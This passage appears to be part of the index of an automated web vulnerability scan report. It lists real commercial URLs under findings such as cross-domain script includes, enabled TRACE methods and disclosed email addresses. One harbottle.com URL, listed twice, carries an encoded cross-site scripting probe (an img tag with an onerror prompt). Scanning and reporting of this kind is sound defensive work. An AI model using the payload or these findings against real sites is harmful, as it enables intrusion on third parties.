19.31. http://afe.specificclick.net/serve/v=5

19.32. http://blog.harbottle.com/dm/

19.33. http://blog.harbottle.com/dm/index.php

19.34. http://clickserve.dartsearch.net/link/click

19.35. http://d7.zedo.com/jsc/d3/fl.js

19.36. http://d7.zedo.com/jsc/d3/fl.js

19.37. http://d7.zedo.com/jsc/d3/fl.js

19.38. http://d7.zedo.com/jsc/d3/fl.js

19.39. http://d7.zedo.com/jsc/d3/fl.js

19.40. http://d7.zedo.com/jsc/d3/fl.js

19.41. http://d7.zedo.com/jsc/d3/fl.js

19.42. http://d7.zedo.com/jsc/d3/fl.js

19.43. http://d7.zedo.com/jsc/d3/fl.js

19.44. http://d7.zedo.com/jsc/d3/fl.js

19.45. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js

19.46. http://data.cnbc.com/quotes/CN

19.47. http://data.cnbc.com/quotes/CN

19.48. http://data.cnbc.com/quotes/HK

19.49. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage

19.50. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main

19.51. http://fls.doubleclick.net/activityi

19.52. http://fls.doubleclick.net/activityi

19.53. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071435827/

19.54. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

19.55. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

19.56. http://optimized-by.rubiconproject.com/a/dk.html

19.57. https://oracleus.wingateweb.com/portal/newreg.ww

19.58. http://readwriteenterprise.disqus.com/combination_widget.js

19.59. http://search.cnbc.com/main.do

19.60. http://search.oracle.com/search/search

19.61. http://serve.directdigitalllc.com/serve.php

19.62. http://serve.directdigitalllc.com/serve.php

19.63. http://serve.directdigitalllc.com/serve.php

19.64. http://serve.directdigitalllc.com/serve.php

19.65. http://serve.directdigitalllc.com/serve.php

19.66. http://serve.directdigitalllc.com/serve.php

19.67. http://serve.directdigitalllc.com/serve.php

19.68. http://serve.directdigitalllc.com/serve.php

19.69. http://serve.directdigitalllc.com/serve.php

19.70. http://serve.directdigitalllc.com/serve.php

19.71. http://sophelle.web5.hubspot.com/Default.aspx

19.72. http://sophelle.web5.hubspot.com/Default.aspx

19.73. http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.prettyPhoto.js

19.74. http://ticker.cnbc.com/scripts/cnbc_ticker.js

19.75. http://www.atg.com/service/main.jsp

19.76. https://www.atg.com/en/password/request/

19.77. https://www.atg.com/service/main.jsp

19.78. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

19.79. http://www.cnbc.com/js/cnbc_quote_components.js

19.80. http://www.covergirl.com/__utm.gif

19.81. http://www.covergirl.com/beauty-products

19.82. http://www.csc.com/search

19.83. http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp

19.84. http://www.cvs.com/CVSApp/search/search.jsp

19.85. http://www.deloitte.com/view/en_US/us/search/index.htm

19.86. http://www.deloitte.com/view/en_US/us/search/index.htm

19.87. http://www.deloitte.com/view/en_US/us/search/index.htm

19.88. http://www.deloitte.com/view/en_US/us/search/index.htm

19.89. http://www.dove.us/Products/Hair/

19.90. http://www.facebook.com/plugins/activity.php

19.91. http://www.facebook.com/plugins/activity.php

19.92. http://www.fekkai.com/

19.93. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp

19.94. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp

19.95. http://www.gillettevenus.com/en_US/search/index.jsp

19.96. http://www.gillettevenus.com/global/blank.html

19.97. http://www.google.com/search

19.98. http://www.google.com/search

19.99. http://www.google.com/search

19.100. http://www.google.com/search

19.101. http://www.googleadservices.com/pagead/conversion/1071435827/

19.102. http://www.harbottle.com/hnl/pages/hnl.php

19.103. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

19.104. http://www.marykay.com/default.aspx

19.105. http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html

19.106. http://www.oracle.com/openworld/register/packages/index.html

19.107. http://www.oracle.com/technetwork/index.html

19.108. http://www.oracle.com/us/ciocentral/index.html

19.109. http://www.oracle.com/us/go/index.html

19.110. http://www.oraclecfo.com/Authentication/Login_w.html

19.111. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

19.112. http://www.rayalab.com/

19.113. http://www.resourcepoint.net/

19.114. http://www.sapient.com/en-us/search.html

19.115. http://www.shopify.com/

19.116. http://www.tenzing.com/atg-ecommerce-hosting.asp

19.117. http://www.volusion.com/

19.118. http://www.youtube.com/embed/kPJh9FWuOks

19.119. http://www.znode.com/znode-multifront/default.aspx

20. Cross-domain script include

20.1. https://account.bigcommerce.com/cart.php

20.2. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2

20.3. http://afe.specificclick.net/serve/v=5

20.4. http://afe.specificclick.net/serve/v=5

20.5. http://afe.specificclick.net/serve/v=5

20.6. http://blog.harbottle.com/dm/

20.7. http://blog.harbottle.com/dm/index.php

20.8. http://blog.ulf-wendel.de/

20.9. http://blogs.oracle.com/otn/resource/html/tweet2.html

20.10. http://cdn5.tribalfusion.com/media/1956006/frame.html

20.11. http://cdn5.tribalfusion.com/media/2516896//frm.html

20.12. https://cms.paypal.com/us/cgi-bin/

20.13. http://data.cnbc.com/quotes

20.14. http://data.cnbc.com/quotes/

20.15. http://data.cnbc.com/quotes/.DJIA

20.16. http://data.cnbc.com/quotes/.DJIA

20.17. http://data.cnbc.com/quotes/.DJIA/tab/1

20.18. http://data.cnbc.com/quotes/.DJIA/tab/2

20.19. http://data.cnbc.com/quotes/.FCHI

20.20. http://data.cnbc.com/quotes/.FCHI/tab/2

20.21. http://data.cnbc.com/quotes/.FTSE

20.22. http://data.cnbc.com/quotes/.FTSE/tab/2

20.23. http://data.cnbc.com/quotes/.GDAXI

20.24. http://data.cnbc.com/quotes/.GDAXI/tab/2

20.25. http://data.cnbc.com/quotes/.N225

20.26. http://data.cnbc.com/quotes/.N225/tab/2

20.27. http://data.cnbc.com/quotes/.SPX

20.28. http://data.cnbc.com/quotes/.SPX/tab/2

20.29. http://data.cnbc.com/quotes/CN

20.30. http://data.cnbc.com/quotes/CN

20.31. http://data.cnbc.com/quotes/COMP

20.32. http://data.cnbc.com/quotes/COMP/tab/2

20.33. http://data.cnbc.com/quotes/HK

20.34. https://deloitte.zettaneer.com/Subscriptions/

20.35. http://digg.com/submit

20.36. http://ecommerce-templates.volusion.com/

20.37. http://edge.sapient.com/assets/scripts/global.js

20.38. http://fls.doubleclick.net/activityi

20.39. https://login.cnbc.com/cas/login

20.40. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

20.41. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.42. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.43. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.44. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.45. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.46. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.47. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.48. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.49. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.50. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.51. https://register.cnbc.com/email/EmailSupport.jsp

20.52. https://register.cnbc.com/forgotPassword.do

20.53. https://register.cnbc.com/forgotPassword1.do

20.54. http://search.cnbc.com/main.do

20.55. http://support.bigcommerce.com/

20.56. https://support.bigcommerce.com/questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F

20.57. http://thinkwrap.com/contact/

20.58. http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/

20.59. http://thinkwrap.com/ourfocus/location-services/

20.60. http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-nav-men.png

20.61. http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-su-menu.gif

20.62. http://www.atg.com/

20.63. http://www.atg.com/en/solutions/

20.64. http://www.atg.com/service/main.jsp

20.65. https://www.atg.com/en/customers/listing/

20.66. https://www.atg.com/en/password/request/

20.67. https://www.atg.com/en/register/

20.68. https://www.atg.com/service/main.jsp

20.69. http://www.beautyproductsdirect.com/

20.70. http://www.beautyproductsdirect.com/lashes.html

20.71. http://www.bigcommerce.com/

20.72. http://www.bigcommerce.com/in-the-news.php

20.73. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

20.74. http://www.bigcommerce.com/plans.php

20.75. https://www.bigcommerce.com/buzz.php

20.76. https://www.bigcommerce.com/careers.php

20.77. https://www.bigcommerce.com/compatible-with.php

20.78. https://www.bigcommerce.com/login.php

20.79. https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php

20.80. http://www.cnbc.com/

20.81. http://www.cnbc.com/id/15837856

20.82. http://www.cnbc.com/id/15837856/site/14081545/

20.83. http://www.cnbc.com/id/15838394

20.84. http://www.cnbc.com/id/15839263/

20.85. http://www.cnbc.com/pointrollads.htm

20.86. http://www.covergirl.com/__utm.gif

20.87. http://www.covergirl.com/beauty-products

20.88. http://www.covergirl.com/favicon.ico

20.89. http://www.covergirl.com/search/results=makeup%20eyelash

20.90. http://www.covergirl.com/search/results=xss%20help%20phone%20cable

20.91. http://www.csc.com/application_services/contact_us

20.92. http://www.csc.com/contact_us

20.93. http://www.csc.com/credit_services/contact_us/

20.94. http://www.csc.com/cybersecurity/contact_us

20.95. http://www.deloitte.com/view/en_US/us/Contact-us/email-us/index.htm

20.96. http://www.deloitte.com/view/en_US/us/Contact-us/index.htm

20.97. http://www.deloitte.com/view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm

20.98. http://www.deloitte.com/view/en_US/us/Industries/index.htm

20.99. http://www.deloitte.com/view/en_US/us/Insights/index.htm

20.100. http://www.deloitte.com/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm

20.101. http://www.deloitte.com/view/en_US/us/index.htm

20.102. http://www.deloitte.com/view/en_US/us/search/index.htm

20.103. http://www.dove.us/Products/Hair/

20.104. http://www.facebook.com/plugins/activity.php

20.105. http://www.fekkai.com/

20.106. http://www.fekkai.com/categories/conditioners/

20.107. http://www.fekkai.com/favicon.ico

20.108. http://www.fekkai.com/images/world_of_fekkai_box.jpg

20.109. http://www.fekkai.com/style/

20.110. http://www.fekkai.com/style/inspiration/

20.111. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp

20.112. http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js

20.113. http://www.gillettevenus.com/en_US/images/go_roll.png

20.114. http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp

20.115. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp

20.116. http://www.gillettevenus.com/en_US/razor_finder/index.jsp

20.117. http://www.gillettevenus.com/en_US/search/index.jsp

20.118. http://www.gillettevenus.com/global/blank.html

20.119. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php

20.120. http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php

20.121. http://www.harbottle.com/hnl/pages/hnl.php

20.122. http://www.harbottle.com/hnl/pages/hnl_search2.php

20.123. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

20.124. http://www.harbottle.com/hnl/pages/hnl_search2.php/a

20.125. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

20.126. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

20.127. http://www.harbottle.com/hnl/pages/pubs/479

20.128. http://www.harbottle.com/hnl/pix/newsletters/50th_logo.jpg

20.129. http://www.harbottle.com/hnl/pix/newsletters/ESportsMasthead.jpg

20.130. http://www.harbottle.com/hnl/pix/newsletters/gronholm_NSLTR.jpg

20.131. http://www.harbottle.com/hnl/pix/newsletters/rugby3.jpg

20.132. http://www.harbottle.com/hnl/pix/newsletters/sjones.jpg

20.133. http://www.harbottle.com/hnl/pix/square.gif

20.134. http://www.harbottle.com/hnl/pix/square_FF9933.gif

20.135. http://www.netsuite.com/portal/home.shtml

20.136. http://www.netsuite.com/portal/products/netsuite/financials/main.shtml

20.137. http://www.netsuite.com/portal/products/netsuite/revenue/main.shtml

20.138. http://www.oracle.com/ao/index.html

20.139. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html

20.140. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html

20.141. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html

20.142. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html

20.143. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html

20.144. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html

20.145. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html

20.146. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html

20.147. http://www.oracle.com/index.html

20.148. http://www.oracle.com/openworld/connect/face-to-face/welcome-reception/index.html

20.149. http://www.oracle.com/openworld/connect/index.html

20.150. http://www.oracle.com/openworld/contact/index.html

20.151. http://www.oracle.com/openworld/index.html

20.152. http://www.oracle.com/openworld/learn/index.html

20.153. http://www.oracle.com/openworld/learn/other/general-sessions/index.html

20.154. http://www.oracle.com/openworld/learn/other/oracle-university/index.html

20.155. http://www.oracle.com/openworld/register/packages/index.html

20.156. http://www.oracle.com/openworld/tools/index.html

20.157. http://www.oracle.com/openworld/tools/mobile/index.html

20.158. http://www.oracle.com/partners/admin/web_account.html

20.159. http://www.oracle.com/partners/en/how-to-do-business/index.html

20.160. http://www.oracle.com/partners/en/join-now/index.html

20.161. http://www.oracle.com/partners/en/knowledge-zone/index.html

20.162. http://www.oracle.com/partners/en/most-popular-resources/enablement-028916.htm

20.163. http://www.oracle.com/partners/en/opn-program/index.html

20.164. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html

20.165. http://www.oracle.com/partners/en/opn-program/membership-resources/index.html

20.166. http://www.oracle.com/partners/en/opn-program/opn-details-by-levels/index.html

20.167. http://www.oracle.com/partners/en/opn-program/specialize/index.html

20.168. http://www.oracle.com/partners/index.html

20.169. http://www.oracle.com/partners/secure/development/index.html

20.170. http://www.oracle.com/partners/secure/development/order-technology-software/access-software-and-support-020672.htm

20.171. http://www.oracle.com/partners/secure/development/order-technology-software/index.html

20.172. http://www.oracle.com/partners/secure/marketing/download-logos/index.html

20.173. http://www.oracle.com/partners/secure/marketing/index.html

20.174. http://www.oracle.com/partners/secure/marketing/marketing-and-event-kits/index.html

20.175. http://www.oracle.com/partners/secure/membership/index.html

20.176. http://www.oracle.com/partners/secure/news/index.html

20.177. http://www.oracle.com/partners/secure/news/worldwide-opn-newsletter/index.html

20.178. http://www.oracle.com/partners/secure/sales/index.html

20.179. http://www.oracle.com/partners/secure/sales/partner-ordering-portal/partner-ordering-portal-020782.htm

20.180. http://www.oracle.com/partners/secure/sales/pricing-licensing/index.html

20.181. http://www.oracle.com/partners/secure/sales/resell-support/index.html

20.182. http://www.oracle.com/partners/secure/sales/sales-kits/index.html

20.183. http://www.oracle.com/partners/secure/support/index.html

20.184. http://www.oracle.com/technetwork/apps-tech/index-095827.html

20.185. http://www.oracle.com/technetwork/apps-tech/index-097651.html

20.186. http://www.oracle.com/technetwork/apps-tech/index.html

20.187. http://www.oracle.com/technetwork/architect/index.html

20.188. http://www.oracle.com/technetwork/articles/index.html

20.189. http://www.oracle.com/technetwork/community/developer-vm/index.html

20.190. http://www.oracle.com/technetwork/community/join/overview/index.html

20.191. http://www.oracle.com/technetwork/community/oracle-ace/index.html

20.192. http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html

20.193. http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html

20.194. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html

20.195. http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html

20.196. http://www.oracle.com/technetwork/database/express-edition/downloads/index.html

20.197. http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html

20.198. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html

20.199. http://www.oracle.com/technetwork/dbadev/index.html

20.200. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html

20.201. http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html

20.202. http://www.oracle.com/technetwork/developer-tools/index.html

20.203. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html

20.204. http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html

20.205. http://www.oracle.com/technetwork/index.html

20.206. http://www.oracle.com/technetwork/indexes/documentation/index.html

20.207. http://www.oracle.com/technetwork/indexes/downloads/index.html

20.208. http://www.oracle.com/technetwork/indexes/products/index.html

20.209. http://www.oracle.com/technetwork/java/index.html

20.210. http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html

20.211. http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html

20.212. http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html

20.213. http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html

20.214. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html

20.215. http://www.oracle.com/technetwork/oem/downloads/index-084446.html

20.216. http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html

20.217. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html

20.218. http://www.oracle.com/technetwork/oem/grid-control/overview/index.html

20.219. http://www.oracle.com/technetwork/oramag/magazine/home/index.html

20.220. http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html

20.221. http://www.oracle.com/technetwork/systems/index.html

20.222. http://www.oracle.com/technetwork/topics/cloud/index.html

20.223. http://www.oracle.com/technetwork/topics/index.html

20.224. http://www.oracle.com/technetwork/topics/newtojava/index.html

20.225. http://www.oracle.com/technetwork/topics/newtojava/overview/index.html

20.226. http://www.oracle.com/technetwork/topics/security/index.html

20.227. http://www.oracle.com/technetwork/topics/soa/index.html

20.228. http://www.oracle.com/technetwork/topics/virtualization/index.html

20.229. http://www.oracle.com/us/ciocentral/index.html

20.230. http://www.oracle.com/us/community/index.html

20.231. http://www.oracle.com/us/corporate/Acquisitions/index.html

20.232. http://www.oracle.com/us/corporate/analystrelations/index.html

20.233. http://www.oracle.com/us/corporate/blogs/index.html

20.234. http://www.oracle.com/us/corporate/careers/index.html

20.235. http://www.oracle.com/us/corporate/citizenship/community/038108.htm

20.236. http://www.oracle.com/us/corporate/citizenship/index.html

20.237. http://www.oracle.com/us/corporate/customers/index.html

20.238. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html

20.239. http://www.oracle.com/us/corporate/features/engineered-173370.html

20.240. http://www.oracle.com/us/corporate/history/index.html

20.241. http://www.oracle.com/us/corporate/index.html

20.242. http://www.oracle.com/us/corporate/innovation/index.html

20.243. http://www.oracle.com/us/corporate/insight/index.html

20.244. http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html

20.245. http://www.oracle.com/us/corporate/investor-relations/index.html

20.246. http://www.oracle.com/us/corporate/oracle-racing-070515.html

20.247. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html

20.248. http://www.oracle.com/us/corporate/press/Executives/index.html

20.249. http://www.oracle.com/us/corporate/press/index.html

20.250. http://www.oracle.com/us/corporate/pricing/index.html

20.251. http://www.oracle.com/us/corporate/pricing/price-lists/index.html

20.252. http://www.oracle.com/us/corporate/profit/index.html

20.253. http://www.oracle.com/us/corporate/publishing/index.html

20.254. http://www.oracle.com/us/corporate/timeline/index.html

20.255. http://www.oracle.com/us/go/index.html

20.256. http://www.oracle.com/us/index.html

20.257. http://www.oracle.com/us/industries/communications/index.html

20.258. http://www.oracle.com/us/industries/education-and-research/018753.htm

20.259. http://www.oracle.com/us/industries/engineering-and-construction/index.html

20.260. http://www.oracle.com/us/industries/financial-services/index.html

20.261. http://www.oracle.com/us/industries/index.html

20.262. http://www.oracle.com/us/industries/retail/index.html

20.263. http://www.oracle.com/us/partnerships/solutions/index.html

20.264. http://www.oracle.com/us/partnerships/specialized-showcase-224514.html

20.265. http://www.oracle.com/us/products/applications/fusion/index.html

20.266. http://www.oracle.com/us/products/applications/index.html

20.267. http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html

20.268. http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html

20.269. http://www.oracle.com/us/products/applications/primavera/index.html

20.270. http://www.oracle.com/us/products/consulting/index.html

20.271. http://www.oracle.com/us/products/database/index.html

20.272. http://www.oracle.com/us/products/enterprise-manager/index.html

20.273. http://www.oracle.com/us/products/financing/index.html

20.274. http://www.oracle.com/us/products/index.html

20.275. http://www.oracle.com/us/products/middleware/exalogic/index.html

20.276. http://www.oracle.com/us/products/middleware/index.html

20.277. http://www.oracle.com/us/products/ondemand/index.html

20.278. http://www.oracle.com/us/products/productslist/index.html

20.279. http://www.oracle.com/us/products/servers-storage/index.html

20.280. http://www.oracle.com/us/products/servers-storage/solaris/index.html

20.281. http://www.oracle.com/us/products/tools/index.html

20.282. http://www.oracle.com/us/social-media/facebook/index.html

20.283. http://www.oracle.com/us/social-media/linkedin/index.html

20.284. http://www.oracle.com/us/social-media/twitter/index.html

20.285. http://www.oracle.com/us/solutions/corporate-governance/index.html

20.286. http://www.oracle.com/us/solutions/datawarehousing/index.html

20.287. http://www.oracle.com/us/solutions/ent-performance-bi/index.html

20.288. http://www.oracle.com/us/solutions/midsize/index.html

20.289. http://www.oracle.com/us/solutions/performance-scalability/index.html

20.290. http://www.oracle.com/us/solutions/solutions-165852.html

20.291. http://www.oracle.com/us/sun/index.html

20.292. http://www.oracle.com/us/support/advanced-customer-services/index.html

20.293. http://www.oracle.com/us/support/contact-068555.html

20.294. http://www.oracle.com/us/support/development-tools-080025.html

20.295. http://www.oracle.com/us/support/index.html

20.296. http://www.oracle.com/us/support/lifetime-support/index.html

20.297. http://www.oracle.com/us/support/oracle-support-services-359636.html

20.298. http://www.oracle.com/us/support/policies/index.html

20.299. http://www.oracle.com/us/support/premier/index.html

20.300. http://www.oracle.com/us/support/support-integration/index.html

20.301. http://www.oracle.com/us/syndication/subscribe/index.html

20.302. http://www.oracle.com/us/technologies/cloud/index.html

20.303. http://www.oracle.com/us/technologies/java/index.html

20.304. http://www.oracle.com/us/technologies/virtualization/index.html

20.305. http://www.oracleimg.com/us/assets/metrics/crossdomain.xml

20.306. http://www.rayalab.com/

20.307. http://www.rayalab.com/free_sample.html

20.308. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22

20.309. http://www.readwriteweb.com/404.html

20.310. http://www.readwriteweb.com/enterprise/2010/11/oracle.php

20.311. http://www.resourcepoint.net/

20.312. http://www.resourcepoint.net/index.htm

20.313. http://www.sapient.com/en-us/about-sapient/alliances.html

20.314. http://www.sapient.com/en-us/about-sapient/alliances/atg.html

20.315. http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html

20.316. http://www.sapient.com/en-us/search.html

20.317. http://www.shopify.com/

20.318. http://www.shopify.com/admin/auth/login

20.319. http://www.shopify.com/examples

20.320. http://www.shopify.com/login

20.321. http://www.shopify.com/tour

20.322. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html

20.323. http://www.tenzing.com/atg-ecommerce-hosting.asp

20.324. http://www.tenzing.com/cloud/cloud-pricing.asp

20.325. http://www.tenzing.com/cloud/sign-up-now.asp

20.326. http://www.tenzing.com/hosting-solutions.asp

20.327. http://www.tenzing.com/sitemap.asp

20.328. http://www.volusion.com/

20.329. http://www.volusion.com/a1/f/OpenSans-Regular-webfont.woff

20.330. http://www.volusion.com/a1/f/OpenSans-Semibold-webfont.woff

20.331. http://www.youtube.com/embed/kPJh9FWuOks

20.332. http://www.youtube.com/embed/oxqAPZmFSUU

20.333. http://www.znode.com/znode-multifront/architecture.aspx

20.334. http://www.znode.com/znode-multifront/default.aspx

20.335. http://www.znode.com/znode-multifront/feature.aspx

21. TRACE method is enabled

21.1. http://1215.ic-live.com/

21.2. http://ads1.msn.com/

21.3. http://afe.specificclick.net/

21.4. http://c.statcounter.com/

21.5. http://cache.specificmedia.com/

21.6. http://channelsun.sun.com/

21.7. http://clk.fetchback.com/

21.8. http://convctr.overture.com/

21.9. http://d.ads.readwriteweb.com/

21.10. http://d1.openx.org/

21.11. http://deloitte.12hna.com/

21.12. http://dev.mysql.com/

21.13. http://digg.com/

21.14. https://dne.oracle.com/

21.15. http://dynpages-mktas.oracle.com/

21.16. http://education.oracle.com/

21.17. https://education.oracle.com/

21.18. http://fido.fetchback.com/

21.19. http://imp.fetchback.com/

21.20. http://legolas.nexac.com/

21.21. http://msnbcmedia.msn.com/

21.22. http://optimized-by.rubiconproject.com/

21.23. http://ping.crowdscience.com/

21.24. http://pixel.everesttech.net/

21.25. http://pixel.fetchback.com/

21.26. http://r.openx.net/

21.27. http://rt.legolas-media.com/

21.28. http://serve.directdigitalllc.com/

21.29. http://tap.rubiconproject.com/

21.30. http://tracker.wordstream.com/

21.31. http://tracking.hubspot.com/

21.32. http://www.beautyproductsdirect.com/

21.33. http://www.fekkai.com/

21.34. http://www.fetchback.com/

21.35. http://www.gillettevenus.com/

21.36. http://www.readwriteweb.com/

22. Email addresses disclosed

22.1. http://ads1.msn.com/library/dap.js

22.2. http://assets1.csc.com/es/downloads/7380_2.pdf

22.3. http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf

22.4. http://blog.ulf-wendel.de/

22.5. http://blogs.oracle.com/otn/

22.6. http://blogs.oracle.com/otn/feed/entries/atom

22.7. http://blogs.oracle.com/otn/feed/entries/rss

22.8. https://dne.oracle.com/pls/uns/OPT_OUT.th

22.9. http://edge.sapient.com/assets/scripts/global.js

22.10. http://education.oracle.com/admin/jscripts/rd_temp_config/1001US_rd_temp_config.js

22.11. http://education.oracle.com/education/jscripts/JSSerializer.js

22.12. http://education.oracle.com/education/jscripts/OUheaderCSS.js

22.13. http://education.oracle.com/education/jscripts/s_code.js

22.14. https://education.oracle.com/admin/jscripts/rd_temp_config/_rd_temp_config.js

22.15. https://education.oracle.com/education/jscripts/OUheaderCSS.js

22.16. https://education.oracle.com/education/jscripts/s_code.js

22.17. http://event.on24.com/r.htm

22.18. https://forms.netsuite.com/app/site/crm/externalleadpage.nl

22.19. https://forums.oracle.com/forums/themes/english/resources/s_code.js

22.20. https://login.cnbc.com/cas/js/cnbc_login.js

22.21. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

22.22. https://oracleus.wingateweb.com/portal/newreg.ww

22.23. https://register.cnbc.com/forgotPassword1.do

22.24. http://search.oracle.com/search/searchui/s_code.js

22.25. https://shop.oracle.com/pls/ostore/f

22.26. https://support.bigcommerce.com/javascript/livesearch.js

22.27. http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.innerfade.js

22.28. http://twitter.com/favorites/shopify.json

22.29. http://webzoomers.com/

22.30. https://www.atg.com/en/password/request/

22.31. https://www.atg.com/javascript/form.js

22.32. http://www.beautyproductsdirect.com/

22.33. http://www.beautyproductsdirect.com/inc/js/jquery.innerfade.js

22.34. http://www.beautyproductsdirect.com/lashes.html

22.35. http://www.covergirl.com/CSS/jqModal.css

